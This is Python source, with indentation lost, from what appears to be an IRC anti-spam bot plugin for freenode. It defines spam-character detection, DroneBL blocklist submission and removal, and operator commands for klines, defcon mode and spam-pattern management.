self.spamchars = {'Ḕ', 'Î', 'Ù', 'Ṋ', 'ℰ', 'Ừ', 'ś', 'ï', 'ℯ', 'ļ', 'ẋ', 'ᾒ', 'ἶ', 'ệ', 'ℓ', 'Ŋ', 'Ḝ', 'ξ', 'ṵ', 'û', 'ẻ', 'Ũ', 'ṡ', '§', 'Ƚ', 'Š', 'ᶙ', 'ṩ', '¹', 'ư', 'Ῐ', 'Ü', 'ŝ', 'ὴ', 'Ș', 'ũ', 'ῑ', 'ⱷ', 'Ǘ', 'Ɇ', 'ĭ', 'ἤ', 'Ɲ', 'Ǝ', 'ủ', 'µ', 'Ỵ', 'Ű', 'ū', 'į', 'ἳ', 'ΐ', 'ḝ', 'Ɛ', 'ṇ', 'È', 'ῆ', 'ử', 'Ň', 'υ', 'Ǜ', 'Ἔ', 'Ὑ', 'μ', 'Ļ', 'ů', 'Ɫ', 'ŷ', 'Ǚ', 'ἠ', 'Ĺ', 'Ę', 'Ὲ', 'Ẍ', 'Ɣ', 'Ϊ', 'ℇ', 'ẍ', 'ῧ', 'ϵ', 'ἦ', 'ừ', 'ṳ', 'ᾕ', 'ṋ', 'ù', 'ῦ', 'Ι', 'ῠ', 'ṥ', 'ὲ', 'ê', 'š', 'ě', 'ề', 'ẽ', 'ī', 'Ė', 'ỷ', 'Ủ', 'ḯ', 'Ἓ', 'Ὓ', 'Ş', 'ύ', 'Ṧ', 'Ŷ', 'ἒ', 'ἵ', 'ė', 'ἰ', 'ẹ', 'Ȇ', 'Ɏ', 'Ί', 'ὶ', 'Ε', 'ḛ', 'Ὤ', 'ǐ', 'ȇ', 'ἢ', 'í', 'ȕ', 'Ữ', '$', 'ή', 'Ṡ', 'ἷ', 'Ḙ', 'Ὢ', 'Ṉ', 'Ľ', 'ῃ', 'Ụ', 'Ṇ', 'ᾐ', 'Ů', 'Ἕ', 'ý', 'Ȅ', 'ᴌ', 'ύ', 'ņ', 'ὒ', 'Ý', 'ế', 'ĩ', 'ǘ', 'Ē', 'ṹ', 'Ư', 'é', 'Ÿ', 'ΰ', 'Ὦ', 'Ë', 'ỳ', 'ἓ', 'ĕ', 'ἑ', 'ṅ', 'ȗ', 'Ν', 'ί', 'ể', 'ᴟ', 'è', 'ᴇ', 'ḭ', 'ȝ', 'ϊ', 'ƪ', 'Ὗ', 'Ų', 'Ề', 'Ṷ', 'ü', 'Ɨ', 'Ώ', 'ň', 'ṷ', 'ƞ', 'Ȗ', 'ș', 'ῒ', 'Ś', 'Ự', 'Ń', 'Ἳ', 'Ứ', 'Ἷ', 'ἱ', 'ᾔ', 'ÿ', 'Ẽ', 'ὖ', 'ὑ', 'ἧ', 'Ὥ', 'ṉ', 'Ὠ', 'ℒ', 'Ệ', 'Ὼ', 'Ẻ', 'ḙ', 'Ŭ', '₴', 'Ὡ', 'ȉ', 'Ṅ', 'ᵪ', 'ữ', 'Ὧ', 'ń', 'Ἐ', 'Ú', 'ɏ', 'î', 'Ⱡ', 'Ƨ', 'Ě', 'ȿ', 'ᴉ', 'Ṩ', 'Ê', 'ȅ', 'ᶊ', 'Ṻ', 'Ḗ', 'ǹ', 'ᴣ', 'ş', 'Ï', 'ᾗ', 'ự', 'ὗ', 'ǔ', 'ᶓ', 'Ǹ', 'Ἶ', 'Ṳ', 'Ʊ', 'ṻ', 'Ǐ', 'ᵴ', 'ῇ', 'Ẹ', 'Ế', 'Ϋ', 'Ū', 'Ῑ', 'ί', 'ỹ', 'Ḯ', 'ǀ', 'Ὣ', 'Ȳ', 'ǃ', 'ų', 'ϴ', 'Ώ', 'Í', 'ì', 'ι', 'ῄ', 'ΰ', 'ἣ', 'ῡ', 'Ἒ', 'Ḽ', 'Ȉ', 'Έ', 'ἴ', 'ᶇ', 'ἕ', 'ǚ', 'Ī', 'Έ', '¥', 'Ṵ', 'ὔ', 'Ŝ', 'ῢ', 'Ἱ', 'ű', 'Ḷ', 'Ὶ', 'ḗ', 'ᴜ', 'ę', 'ὐ', 'Û', 'ᾑ', 'Ʋ', 'Ἑ', 'Ì', 'ŋ', 'Ḛ', 'ỵ', 'Ễ', '℮', '×', 'Ῠ', 'Ἵ', 'Ύ', 'Ử', 'ᴈ', 'ē', 'Ἰ', 'ᶖ', 'ȳ', 'Ǯ', 'ὓ', 'ὕ', 'ῂ', 'Ĕ', 'É', 'ᾓ', 'Ḻ', 'Ņ', 'ἥ', 'ḕ', 'ὺ', 'Ȋ', 'ı', 'Ȕ', 'ṧ', 'ᾖ', 'Ί', 'ΐ', '€', 'Ḭ', 'Ƴ', 'ȵ', 'Ṹ', 'Ñ', 'Ƞ', 'Ȩ', 'ῐ', 'ứ', 'έ', 'ł', 'ŭ', '϶', 'ƴ', '₤', 'ƨ', '£', 'Ł', 'ñ', 'ë', 'ễ', 'ǯ', 'ᶕ', 'ή', 'ᶔ', 'Π', 'ȩ', 'ἐ', 'Ể', 'ε', 'Ĩ', 'ǜ', 'Į', 'Ξ', 'Ḹ', 'Ῡ', '∩', 'ú', 'Χ', 'ụ'}
def removeDnsbl (self,irc,ip,droneblHost,droneblKey):
headers = {
'Content-Type' : 'text/xml'
}
def check(answer):
found = False
for line in answer.split('\n'):
if line.find('listed="1"') != -1:
id = line.split('id="')[1]
id = id.split('"')[0]
if line.find('type="18"') != -1:
self.logChannel(irc,'RMDNSBL: %s (%s) not removed: is type 18' % (ip,id))
if ip in self.rmrequestors:
irc.queueMsg(ircmsgs.privmsg(self.rmrequestors[ip],'%s (%s) not removed: is type 18' % (ip,id)))
del self.rmrequestors[ip]
continue
data = "<?xml version=\"1.0\"?><request key='"+droneblKey+"'><remove id='"+id+"' /></request>"
found = True
try:
r = requests.post(droneblHost,data=data,headers=headers)
response = r.text.replace('\n','')
if "You are not authorized to remove this incident" in response:
self.logChannel(irc,'RMDNSBL: %s (%s) failed: You are not authorized to remove this incident' % (ip,id))
if ip in self.rmrequestors:
irc.queueMsg(ircmsgs.privmsg(self.rmrequestors[ip],'%s (%s) not removed: You are not authorized to remove this incident' % (ip,id)))
del self.rmrequestors[ip]
else:
self.logChannel(irc,'RMDNSBL: %s (%s) removed' % (ip,id))
if ip in self.rmrequestors:
irc.queueMsg(ircmsgs.privmsg(self.rmrequestors[ip],'%s (%s) removed' % (ip,id)))
del self.rmrequestors[ip]
except:
self.logChannel(irc,'RMDNSBL: %s (%s) failed: unknown error' % (ip,id))
if ip in self.rmrequestors:
irc.queueMsg(ircmsgs.privmsg(self.rmrequestors[ip],'%s (%s) not removed: unknown error' % (ip,id)))
del self.rmrequestors[ip]
if not found:
self.logChannel(irc,'RMDNSBL: %s (none) not removed: no listing found' % ip)
if ip in self.rmrequestors:
irc.queueMsg(ircmsgs.privmsg(self.rmrequestors[ip],'%s (none) not removed: no listing found' % ip))
del self.rmrequestors[ip]
data = "<?xml version=\"1.0\"?><request key='"+droneblKey+"'><lookup ip='"+ip+"' /></request>"
r = requests.post(droneblHost,data=data,headers=headers)
if r.status_code == 200:
check(r.text)
else:
self.logChannel(irc,'RMDNSBL: %s (unknown) failed: status code %s' % (ip,r.status_code))
if ip in self.rmrequestors:
irc.queueMsg(ircmsgs.privmsg(self.rmrequestors[ip],'%s (unknown) not removed: status code %s' % (ip,r.status_code)))
def fillDnsbl (self,irc,ip,droneblHost,droneblKey,comment=None):
headers = {
'Content-Type' : 'text/xml'
}
def check(answer):
self.log.info ('fillDnsbl, answered %s' % ip)
if 'listed="1"' in answer:
self.logChannel(irc,'DNSBL: %s (already listed)' % ip)
return
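# Map the free-form comment to a DroneBL listing type; 3 (IRC drone) is used
# when no known comment matches.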
dnsblTypes = {
'Bottler': 5,
'Unknown spambot or drone': 6,
'DDOS Drone': 7,
'SOCKS Proxy': 8,
'HTTP Proxy': 9,
'ProxyChain': 10,
'Web Page Proxy': 11,
'Open DNS Resolver': 12,
'Brute force attackers': 13,
'Open Wingate Proxy': 14,
'Compromised router / gateway': 15,
'Autorooting worms': 16,
'Automatically determined botnet IPs (experimental)': 17,
'DNS/MX type hostname detected on IRC': 18,
'Abused VPN Service': 19,
}
type = dnsblTypes.get(comment, 3)
data = "<?xml version=\"1.0\"?><request key='"+droneblKey+"'><add ip='"+ip+"' type='"+str(type)+"' comment='used by irc spam bot' /></request>"
r = requests.post(droneblHost,data=data,headers=headers)
if r.status_code != 200:
self.logChannel(irc,'DNSBL: %s (add returned %s %s)' % (ip,r.status_code,r.reason))
if comment:
self.logChannel(irc,'DNSBL: %s (%s,type:%s)' % (ip,comment,type))
else:
self.logChannel(irc,'DNSBL: %s' % ip)
self.log.info('fillDnsbl, checking %s' % ip)
data = "<?xml version=\"1.0\"?><request key='"+droneblKey+"'><lookup ip='"+ip+"' /></request>"
try:
r = requests.post(droneblHost,data=data,headers=headers,timeout=9)
if r.status_code == 200:
check(r.text)
else:
self.logChannel(irc,'DNSBL: %s (%s)' % (ip,r.status_code))
except requests.exceptions.RequestException as e:
self.logChannel(irc,'DNSBL: %s (%s)' % (ip,e))
def state (self,irc,msg,args,channel):
"""[<channel>]
returns state of the plugin, for optional <channel>"""
self.cleanup(irc)
i = self.getIrc(irc)
if not channel:
irc.queueMsg(ircmsgs.privmsg(msg.nick,'Opered %s, enable %s, defcon %s, netsplit %s' % (i.opered,self.registryValue('enable'),(i.defcon),i.netsplit)))
irc.queueMsg(ircmsgs.privmsg(msg.nick,'There are %s permanent patterns and %s channels directly monitored' % (len(i.patterns),len(i.channels))))
channels = 0
prefixs = 0
for k in i.queues:
if irc.isChannel(k):
channels += 1
elif ircutils.isUserHostmask(k):
prefixs += 1
irc.queueMsg(ircmsgs.privmsg(msg.nick,"Via server's notices: %s channels and %s users monitored" % (channels,prefixs)))
for chan in i.channels:
if channel == chan:
ch = self.getChan(irc,chan)
if not self.registryValue('ignoreChannel',channel=chan):
called = ""
if ch.called:
called = 'currently in defcon'
irc.queueMsg(ircmsgs.privmsg(msg.nick,'On %s (%s users) %s:' % (chan,len(ch.nicks),called)))
protections = ['flood','lowFlood','repeat','lowRepeat','massRepeat','lowMassRepeat','hilight','nick','ctcp']
for protection in protections:
if self.registryValue('%sPermit' % protection,channel=chan) > -1:
permit = self.registryValue('%sPermit' % protection,channel=chan)
life = self.registryValue('%sLife' % protection,channel=chan)
abuse = self.hasAbuseOnChannel(irc,chan,protection)
if abuse:
abuse = ' (ongoing abuses) '
else:
abuse = ''
count = 0
if protection == 'repeat':
for b in ch.buffers:
if ircutils.isUserHostmask('n!%s' % b):
count += 1
else:
for b in ch.buffers:
if protection in b:
count += len(ch.buffers[b])
if count:
count = " - %s user's buffers" % count
else:
count = ""
irc.queueMsg(ircmsgs.privmsg(msg.nick," - %s : %s/%ss %s%s" % (protection,permit,life,abuse,count)))
irc.replySuccess()
state = wrap(state,['owner',optional('channel')])
def defcon (self,irc,msg,args,channel):
"""[<channel>]
limits are lowered, globally or for a specific <channel>"""
i = self.getIrc(irc)
if channel and channel != self.registryValue('logChannel'):
if channel in i.channels and self.registryValue('abuseDuration',channel=channel) > 0:
chan = self.getChan(irc,channel)
if chan.called:
self.logChannel(irc,'INFO: [%s] rescheduled ignores lifted, limits lowered (by %s) for %ss' % (channel,msg.nick,self.registryValue('abuseDuration',channel=channel)))
chan.called = time.time()
else:
self.logChannel(irc,'INFO: [%s] ignores lifted, limits lowered (by %s) for %ss' % (channel,msg.nick,self.registryValue('abuseDuration',channel=channel)))
chan.called = time.time()
else:
if i.defcon:
i.defcon = time.time()
irc.reply('Already in defcon mode, reset, %ss more' % self.registryValue('defcon'))
else:
i.defcon = time.time()
self.logChannel(irc,"INFO: ignores lifted and abuses end to klines for %ss by %s" % (self.registryValue('defcon'),msg.nick))
if not i.god:
irc.sendMsg(ircmsgs.IrcMsg('MODE %s +p' % irc.nick))
else:
self.applyDefcon (irc)
irc.replySuccess()
defcon = wrap(defcon,['owner',optional('channel')])
def vacuum (self,irc,msg,args):
"""takes no arguments
VACUUM the permanent patterns database"""
db = self.getDb(irc.network)
c = db.cursor()
c.execute('VACUUM')
c.close()
irc.replySuccess()
vacuum = wrap(vacuum,['owner'])
def leave (self,irc,msg,args,channel):
"""<channel>
force the bot to part <channel>; it won't rejoin even if invited
"""
if channel in irc.state.channels:
reason = conf.supybot.plugins.channel.partMsg.getValue()
irc.queueMsg(ircmsgs.part(channel,reason))
try:
network = conf.supybot.networks.get(irc.network)
network.channels().remove(channel)
except:
pass
self.setRegistryValue('lastActionTaken',-1.0,channel=channel)
irc.replySuccess()
leave = wrap(leave,['owner','channel'])
def stay (self,irc,msg,args,channel):
"""<channel>
force the bot to stay in <channel>
"""
self.setRegistryValue('leaveChannelIfNoActivity',-1,channel=channel)
if not channel in irc.state.channels:
self.setRegistryValue('lastActionTaken',time.time(),channel=channel)
irc.queueMsg(ircmsgs.join(channel))
try:
network = conf.supybot.networks.get(irc.network)
network.channels().add(channel)
except KeyError:
pass
irc.replySuccess()
stay = wrap(stay,['owner','channel'])
def isprotected (self,irc,msg,args,hostmask,channel):
"""<hostmask> [<channel>]
returns true if <hostmask> is protected, in optional <channel>"""
if ircdb.checkCapability(hostmask, 'protected'):
irc.reply('%s is globally protected' % hostmask)
else:
if channel:
protected = ircdb.makeChannelCapability(channel, 'protected')
if ircdb.checkCapability(hostmask, protected):
irc.reply('%s is protected in %s' % (hostmask,channel))
else:
irc.reply('%s is not protected in %s' % (hostmask,channel))
else:
irc.reply('%s is not protected' % hostmask)
isprotected = wrap(isprotected,['owner','hostmask',optional('channel')])
def checkactions (self,irc,msg,args,duration):
"""<duration> in days
return channels where last action taken is older than <duration>"""
channels = []
duration = duration * 24 * 3600
for channel in irc.state.channels:
if irc.isChannel(channel):
if self.registryValue('mainChannel') in channel or channel == self.registryValue('reportChannel') or self.registryValue('snoopChannel') == channel or self.registryValue('secretChannel') == channel:
continue
if self.registryValue('ignoreChannel',channel):
continue
action = self.registryValue('lastActionTaken',channel=channel)
if action > 0:
if time.time()-action > duration:
channels.append('%s: %s' % (channel,time.strftime('%Y-%m-%d %H:%M:%S GMT',time.gmtime(action))))
else:
channels.append(channel)
irc.replies(channels,None,None,False)
checkactions = wrap(checkactions,['owner','positiveInt'])
def netsplit (self,irc,msg,args,duration):
"""<duration>
enter netsplit mode for <duration> (in seconds)"""
i = self.getIrc(irc)
if i.netsplit:
i.netsplit = time.time()+duration
irc.reply('Already in netsplit mode, reset, %ss more' % duration)
else:
i.netsplit = time.time()+duration
self.logChannel(irc,"INFO: netsplit activated for %ss by %s: some abuses are ignored" % (duration,msg.nick))
irc.replySuccess()
netsplit = wrap(netsplit,['owner','positiveInt'])
def checkpattern (self,irc,msg,args,text):
""" <text>
returns permanent patterns triggered by <text>"""
i = self.getIrc(irc)
patterns = []
text = text.encode('utf-8').strip()
for k in i.patterns:
pattern = i.patterns[k]
if pattern.match(text):
patterns.append('#%s' % pattern.uid)
if len(patterns):
irc.queueMsg(ircmsgs.privmsg(msg.nick,'%s matches: %s' % (len(patterns),', '.join(patterns))))
else:
irc.reply('No matches')
checkpattern = wrap(checkpattern,['owner','text'])
def lspattern (self,irc,msg,args,optlist,pattern):
"""[--deep] <id|pattern>
returns patterns which match <pattern>, or info about pattern #<id>; use --deep to also search deactivated patterns, or * to return all patterns"""
i = self.getIrc(irc)
deep = pattern == '*'
for (option, arg) in optlist:
if option == 'deep':
deep = True
results = i.ls(self.getDb(irc.network),pattern,deep)
if len(results):
if deep or pattern == '*':
for r in results:
irc.queueMsg(ircmsgs.privmsg(msg.nick,r))
else:
irc.replies(results,None,None,False)
else:
irc.reply('no pattern found')
lspattern = wrap(lspattern,['owner',getopts({'deep': ''}),'text'])
def rmpattern (self,irc,msg,args,ids):
"""<id> [<id>]
remove permanent pattern by id"""
i = self.getIrc(irc)
results = []
for id in ids:
result = i.remove(self.getDb(irc.network),id)
if result:
results.append('#%s' % id)
self.logChannel(irc,'PATTERN: %s deleted %s' % (msg.nick,','.join(results)))
irc.replySuccess()
rmpattern = wrap(rmpattern,['owner',many('positiveInt')])
def addpattern (self,irc,msg,args,limit,life,pattern):
"""<limit> <life> <pattern>
add a permanent <pattern>: kline after <limit> matches within <life> seconds;
use limit 0 for an immediate kline"""
i = self.getIrc(irc)
pattern = pattern.lower()
result = i.add(self.getDb(irc.network),msg.prefix,pattern,limit,life,False)
self.logChannel(irc,'PATTERN: %s added #%s : "%s" %s/%ss' % (msg.nick,result,pattern,limit,life))
irc.reply('#%s added' % result)
addpattern = wrap(addpattern,['owner','nonNegativeInt','positiveInt','text'])
def addregexpattern (self,irc,msg,args,limit,life,pattern):
"""<limit> <life> /<pattern>/
add a permanent regexp /<pattern>/: kline after <limit> matches within <life> seconds;
use limit 0 for an immediate kline"""
i = self.getIrc(irc)
result = i.add(self.getDb(irc.network),msg.prefix,pattern[0],limit,life,True)
self.logChannel(irc,'PATTERN: %s added #%s : "%s" %s/%ss' % (msg.nick,result,pattern[0],limit,life))
irc.reply('#%s added' % result)
addregexpattern = wrap(addregexpattern,['owner','nonNegativeInt','positiveInt','getPatternAndMatcher'])
def editpattern (self,irc,msg,args,uid,limit,life,comment):
"""<id> <limit> <life> [<comment>]
edit #<id> with new <limit> <life> and <comment>"""
i = self.getIrc(irc)
result = i.edit(self.getDb(irc.network),uid,limit,life,comment)
if result:
if comment:
self.logChannel(irc,'PATTERN: %s edited #%s with %s/%ss (%s)' % (msg.nick,uid,limit,life,comment))
else:
self.logChannel(irc,'PATTERN: %s edited #%s with %s/%ss' % (msg.nick,uid,limit,life))
irc.replySuccess()
else:
irc.reply("#%s doesn't exist")
editpattern = wrap(editpattern,['owner','positiveInt','nonNegativeInt','positiveInt',optional('text')])
def togglepattern (self,irc,msg,args,uid,toggle):
"""<id> <boolean>
activate or deactivate #<id>"""
i = self.getIrc(irc)
result = i.toggle(self.getDb(irc.network),uid,msg.prefix,toggle)
if result:
if toggle:
self.logChannel(irc,'PATTERN: %s enabled #%s' % (msg.nick,uid))
else:
self.logChannel(irc,'PATTERN: %s disabled #%s' % (msg.nick,uid))
irc.replySuccess()
else:
irc.reply("#%s doesn't exist or is already in requested state" % uid)
togglepattern = wrap(togglepattern,['owner','positiveInt','boolean'])
def lstmp (self,irc,msg,args,channel):
"""[<channel>]
returns temporary patterns for given channel"""
i = self.getIrc(irc)
if channel in i.channels:
chan = self.getChan(irc,channel)
if chan.patterns:
patterns = list(chan.patterns)
if len(patterns):
irc.reply('[%s] %s patterns : %s' % (channel,len(patterns),', '.join(patterns)))
else:
irc.reply('[%s] no active pattern' % channel)
else:
irc.reply('[%s] no active pattern' % channel)
else:
irc.reply('[%s] is unknown' % channel)
lstmp = wrap(lstmp,['op'])
def dnsblresolve (self,irc,msg,args,ips):
"""<ip> [,<ip>]
add <ips> to dronebl; hostmasks can be provided"""
for ip in ips:
if utils.net.isIPV4(ip) or utils.net.bruteIsIPV6(ip):
t = world.SupyThread(target=self.fillDnsbl,name=format('fillDnsbl %s', ip),args=(irc,ip,self.registryValue('droneblHost'),self.registryValue('droneblKey'),"Unknown spambot or drone"))
t.setDaemon(True)
t.start()
else:
prefix = "*!*@%s" % ip
if ircutils.isUserHostmask(prefix):
t = world.SupyThread(target=self.resolve,name=format('resolve %s', prefix),args=(irc,prefix,'',True,"Unknown spambot or drone"))
t.setDaemon(True)
t.start()
irc.replySuccess()
dnsblresolve = wrap(dnsblresolve,['owner',commalist('something')])
def dnsbl (self,irc,msg,args,ips,comment):
"""<ip> [,<ip>] [<comment>]
add <ips> on dronebl, <comment> can be used to change type (Bottler|Unknown spambot or drone|DDOS Drone|SOCKS Proxy|HTTP Proxy|ProxyChain|Web Page Proxy|Open DNS Resolver|Brute force attackers|Open Wingate Proxy|Compromised router / gateway|Autorooting worms)"""
for ip in ips:
if utils.net.isIPV4(ip) or utils.net.bruteIsIPV6(ip):
t = world.SupyThread(target=self.fillDnsbl,name=format('fillDnsbl %s', ip),args=(irc,ip,self.registryValue('droneblHost'),self.registryValue('droneblKey'),comment))
t.setDaemon(True)
t.start()
irc.replySuccess()
dnsbl = wrap(dnsbl,['owner',commalist('ip'),rest('text')])
def rmdnsbl (self,irc,msg,args,ips):
"""<ip> [<ip>]
remove <ips> from dronebl"""
for ip in ips:
if utils.net.isIPV4(ip) or utils.net.bruteIsIPV6(ip):
self.rmrequestors[ip] = msg.nick
t = world.SupyThread(target=self.removeDnsbl,name=format('rmDnsbl %s', ip),args=(irc,ip,self.registryValue('droneblHost'),self.registryValue('droneblKey')))
t.setDaemon(True)
t.start()
irc.replySuccess()
rmdnsbl = wrap(rmdnsbl,['owner',many('ip')])
def addtmp (self,irc,msg,args,channel,text):
"""[<channel>] <message>
add a string to the channel's temporary patterns"""
text = text.lower()
i = self.getIrc(irc)
if channel in i.channels:
chan = self.getChan(irc,channel)
shareID = self.registryValue('shareComputedPatternID',channel=channel)
if shareID == -1 or not i.defcon:
life = self.registryValue('computedPatternLife',channel=channel)
if not chan.patterns:
chan.patterns = utils.structures.TimeoutQueue(life)
elif chan.patterns.timeout != life:
chan.patterns.setTimeout(life)
chan.patterns.enqueue(text)
self.logChannel(irc,'PATTERN: [%s] added tmp "%s" for %ss by %s' % (channel,text,life,msg.nick))
irc.replySuccess()
else:
n = 0
l = self.registryValue('computedPatternLife',channel=channel)
for channel in i.channels:
chan = self.getChan(irc,channel)
id = self.registryValue('shareComputedPatternID',channel=channel)
if id == shareID:
life = self.registryValue('computedPatternLife',channel=channel)
if not chan.patterns:
chan.patterns = utils.structures.TimeoutQueue(life)
elif chan.patterns.timeout != life:
chan.patterns.setTimeout(life)
chan.patterns.enqueue(text)
n = n + 1
self.logChannel(irc,'PATTERN: added tmp "%s" for %ss by %s in %s channels' % (text,l,msg.nick,n))
irc.replySuccess()
else:
irc.reply('unknown channel')
addtmp = wrap(addtmp,['op','text'])
def addglobaltmp (self,irc,msg,args,text):
"""<text>
add <text> to temporary patterns in all channels"""
text = text.lower()
i = self.getIrc(irc)
n = 0
for channel in i.channels:
chan = self.getChan(irc,channel)
life = self.registryValue('computedPatternLife',channel=channel)
if not chan.patterns:
chan.patterns = utils.structures.TimeoutQueue(life)
elif chan.patterns.timeout != life:
chan.patterns.setTimeout(life)
chan.patterns.enqueue(text)
n = n + 1
self.logChannel(irc,'PATTERN: added tmp "%s" for %ss by %s in %s channels' % (text,life,msg.nick,n))
irc.replySuccess()
addglobaltmp = wrap(addglobaltmp,['owner','text'])
def rmtmp (self,irc,msg,args,channel):
"""[<channel>]
remove temporary patterns for given channel"""
i = self.getIrc(irc)
if channel in i.channels:
chan = self.getChan(irc,channel)
shareID = self.registryValue('shareComputedPatternID',channel=channel)
if shareID != -1:
n = 0
for channel in i.channels:
id = self.registryValue('shareComputedPatternID',channel=channel)
if id == shareID:
if i.channels[channel].patterns:
i.channels[channel].patterns.reset()
n = n + 1
self.logChannel(irc,'PATTERN: removed tmp patterns in %s channels by %s' % (n,msg.nick))
elif chan.patterns:
l = len(chan.patterns)
chan.patterns.reset()
if l:
self.logChannel(irc,'PATTERN: [%s] removed %s tmp pattern by %s' % (channel,l,msg.nick))
irc.replySuccess()
else:
irc.reply('[%s] no active pattern' % channel)
else:
irc.reply('[%s] no active pattern' % channel)
else:
irc.reply('unknown channel')
rmtmp = wrap(rmtmp,['op'])
def unkline (self,irc,msg,args,nick):
"""<nick>
request unkline of <nick>, klined recently from your channel
"""
channels = []
ops = []
nick = nick.lower()
for channel in irc.state.channels:
if msg.nick in irc.state.channels[channel].ops:
chan = self.getChan(irc,channel)
if len(chan.klines):
for q in chan.klines:
self.log.info('klines found %s' % q)
if q.startswith(nick):
ip = q.split(' ')[1]
channels.append(channel)
if not isCloaked('%s!%s' % (nick,ip),self):
if self.registryValue('useOperServ'):
irc.sendMsg(ircmsgs.IrcMsg('PRIVMSG OperServ :AKILL DEL %s' % ip))
else:
irc.queueMsg(ircmsgs.IrcMsg('UNKLINE %s' % ip))
if self.registryValue('clearTmpPatternOnUnkline',channel=channel):
if chan.patterns and len(chan.patterns):
self.logChannel(irc,'PATTERN: [%s] removed %s tmp pattern by %s' % (channel,len(chan.patterns),msg.nick))
chan.patterns.reset()
self.logChannel(irc,'OP: [%s] %s unklined %s (%s)' % (channel,msg.nick,ip,nick))
irc.reply('The ban on %s from %s has been lifted' % (nick,channel))
else:
self.logChannel(irc,'OP: [%s] %s asked for removal of %s (%s)' % (channel,msg.nick,ip,nick))
irc.reply(self.registryValue('msgInviteConfirm'))
ops.append(channel)
if len(ops):
if not len(channels):
irc.replyError("'%s' does not match any recent bans from %s" % (nick,', '.join(ops)))
else:
irc.replyError("Only **Opped** channel operators of the channel the ban originated in can remove k-lines. If you have any questions, contact freenode staff (#freenode-sigyn)")
unkline = wrap(unkline,['private','text'])
def oper (self,irc,msg,args):
"""takes no arguments
ask bot to oper"""
if len(self.registryValue('operatorNick')) and len(self.registryValue('operatorPassword')):
irc.sendMsg(ircmsgs.IrcMsg('OPER %s %s' % (self.registryValue('operatorNick'),self.registryValue('operatorPassword'))))
irc.replySuccess()
else:
irc.replyError('operatorNick or operatorPassword is empty')
oper = wrap(oper,['owner'])
def undline (self,irc,msg,args,txt):
"""<ip>
undline an ip
"""
irc.queueMsg(ircmsgs.IrcMsg('UNDLINE %s on *' % txt))
irc.replySuccess()
undline = wrap(undline,['owner','ip'])
def checkresolve (self,irc,msg,args,txt):
"""<nick!ident@hostmask>
returns computed hostmask"""
irc.reply(self.prefixToMask(irc,txt))
checkresolve = wrap(checkresolve,['owner','hostmask'])
# internal stuff
def applyDefcon (self, irc):
i = self.getIrc(irc)
for channel in irc.state.channels:
if irc.isChannel(channel) and self.registryValue('defconMode',channel=channel):
chan = self.getChan(irc,channel)
if i.defcon or chan.called:
if not 'z' in irc.state.channels[channel].modes:
if irc.nick in list(irc.state.channels[channel].ops):
irc.sendMsg(ircmsgs.IrcMsg('MODE %s +qz $~a' % channel))
else:
irc.sendMsg(ircmsgs.IrcMsg('MODE %s +oqz %s $~a' % (channel,irc.nick)))
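# _ip_ranges expands a bare IP (or a dehexed gateway/.../ip.x.x.x.x cloak) into
# a list of covering CIDR ranges used for ban-collection tracking; for example
# 203.0.113.77 yields 203.0.113.64/27, 203.0.113.64/26, 203.0.113.0/25 and
# 203.0.113.0/24. Hosts that are neither IPs nor such cloaks are returned as-is.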
def _ip_ranges (self, h):
if '/' in h:
# we've got a cloak
parts = h.split('/')
if parts[0] == 'gateway' and parts[-1].startswith('ip.'):
# we've got a dehexed gateway IP cloak
h = parts[-1].split('.', 1)[1]
else:
return [h]
if utils.net.isIPV4(h):
prefixes = [27, 26, 25, 24]
elif utils.net.bruteIsIPV6(h):
# noteworthy IPv6 allocation information
# - linode assigns a /128 by default. can also offer /56, /64 & /116
# - xfinity (comcast) has been reported as offering /60
# - hurricane electric tunnel brokers get a /48
prefixes = [120, 118, 116, 114, 112, 110, 64, 60, 56, 48]
else:
return [h]
ranges = []
for prefix in prefixes:
range = ipaddress.ip_network('%s/%d' % (h, prefix), strict=False).with_prefixlen
ranges.append(range)
return ranges
def resolve (self,irc,prefix,channel='',dnsbl=False,comment=False):
(nick,ident,host) = ircutils.splitHostmask(prefix)
if ident.startswith('~'):
ident = '*'
if prefix in self.cache:
return self.cache[prefix]
try:
resolver = dns.resolver.Resolver()
resolver.timeout = self.registryValue('resolverTimeout')
resolver.lifetime = self.registryValue('resolverTimeout')
L = []
ips = None
try:
ips = resolver.query(host,'AAAA')
except:
ips = None
if ips:
for ip in ips:
if not str(ip) in L:
L.append(str(ip))
try:
ips = resolver.query(host,'A')
except:
ips = None
if ips:
for ip in ips:
if not str(ip) in L:
L.append(str(ip))
#self.log.debug('%s resolved as %s' % (prefix,L))
if len(L) == 1:
h = L[0]
#self.log.debug('%s is resolved as %s@%s' % (prefix,ident,h))
if dnsbl:
if utils.net.isIPV4(h) or utils.net.bruteIsIPV6(h):
if len(self.registryValue('droneblKey')) and len(self.registryValue('droneblHost')) and self.registryValue('enable'):
t = world.SupyThread(target=self.fillDnsbl,name=format('fillDnsbl %s', h),args=(irc,h,self.registryValue('droneblHost'),self.registryValue('droneblKey'),comment))
t.setDaemon(True)
t.start()
i = self.getIrc(irc)
if prefix in i.resolving:
del i.resolving[prefix]
return
self.cache[prefix] = '%s@%s' % (ident,h)
else:
self.cache[prefix] = '%s@%s' % (ident,host)
except:
self.cache[prefix] = '%s@%s' % (ident,host)
i = self.getIrc(irc)
if channel and channel in irc.state.channels:
chan = self.getChan(irc,channel)
if nick in irc.state.channels[channel].users:
if nick in chan.nicks:
chan.nicks[nick][2] = self.cache[prefix]
if prefix in i.resolving:
del i.resolving[prefix]
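# prefixToMask turns a nick!ident@host prefix into the ident@host mask used for
# bans: freenode gateway/cloak hosts are generalized, '~' idents are wildcarded,
# and when the host is neither an IP nor a cloak a background DNS resolution is
# started (unless useWhoWas is preferred), falling back to ident@host meanwhile.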
def prefixToMask (self,irc,prefix,channel='',dnsbl=False,comment=None):
if prefix in self.cache:
return self.cache[prefix]
(nick,ident,host) = ircutils.splitHostmask(prefix)
if '/' in host:
if host.startswith('gateway/web/freenode'):
if 'ip.' in host:
self.cache[prefix] = '*@%s' % host.split('ip.')[1]
else:
# syn offline / busy
self.cache[prefix] = '%s@gateway/web/freenode/*' % ident
elif host.startswith('gateway/tor-sasl'):
self.cache[prefix] = '*@%s' % host
elif host.startswith('gateway/vpn') or host.startswith('nat/'):
if ident.startswith('~'):
ident = '*'
if '/x-' in host:
host = host.split('/x-')[0] + '/*'
self.cache[prefix] = '%s@%s' % (ident,host)
elif host.startswith('gateway'):
h = host.split('/')
if 'ip.' in host:
ident = '*'
h = host.split('ip.')[1]
elif '/vpn/' in host:
if '/x-' in host:
h = h[:3]
h = '%s/*' % '/'.join(h)
else:
h = host
if ident.startswith('~'):
ident = '*'
